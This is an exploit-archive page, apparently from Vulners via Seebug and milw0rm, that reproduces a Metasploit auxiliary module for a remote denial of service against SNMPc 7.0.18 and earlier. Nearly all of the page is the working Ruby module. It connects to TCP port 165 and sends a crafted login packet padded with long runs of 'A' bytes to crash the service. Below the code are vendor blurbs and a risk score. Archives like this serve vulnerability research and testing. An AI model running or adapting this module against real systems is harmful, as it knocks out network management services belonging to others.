Lucene search
K

SNMPc <= 7.0.18 Remote Denial of Service Exploit (meta)

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 14 Views

SNMPc <= 7.0.18 Remote Denial of Service Exploi

Code

                                                ##
# $Id: snmpc.rb  2007-06-03  $
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##


require &#39;msf/core&#39;

module Msf

class Auxiliary::Dos::Windows::Snmpc &#60; Msf::Auxiliary

	include Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			&#39;Name&#39;           =&#62; &#39;SNMPc &#39;,
			&#39;Description&#39;    =&#62; %q{
				This module sends a specially-crafted packet to the service login of snmpc 
				causing a denial of service of snmpc.
			},
			&#39;Author&#39;         =&#62; [ &#39;En Douli, Tks to OaiTeam &#60;[email protected]&#62;&#39; ],
			&#39;License&#39;        =&#62; MSF_LICENSE,
			&#39;Version&#39;        =&#62; &#39;$Revision: 1 $&#39;,
			&#39;References&#39;     =&#62;
				[
					[ &#39;CVE&#39;, &#39;XXXXXXX&#39; ],
				]))
			
			register_options([Opt::RPORT(165),], self.class)
	end

	def run
		connect
		init = &#34;\x14\x00\x00\x00\x70\xa9\x00\x00\x51\x03\x00\x00\x02\x00\x00\x00\x72\x63\x6f\x6e&#34;
		pkt = &#34;\x29\x00\x00\x00\xbc\xee\x00\x00\x52\x03\x00\x00\x02\x00\x00\x00\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74&#34;
		pkt &#60;&#60; &#34;\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41&#34; * 56
		pkt &#60;&#60; &#34;\x41\x41\x41\x41\x41\x41\x41\x41\x41\x09&#34;
		pkt &#60;&#60; &#34;\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41&#34; * 35
		pkt &#60;&#60;	 &#34;\x41\x41\x41\x41\x41\x41\x41\x41\x09\x30\x00&#34;
		
		print_status(&#34;Sending dos packet ... &#34;)
		
		sock.put(init)
		sock.put(pkt)
		
		disconnect
	end

end
end	

# milw0rm.com [2007-06-04]

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
14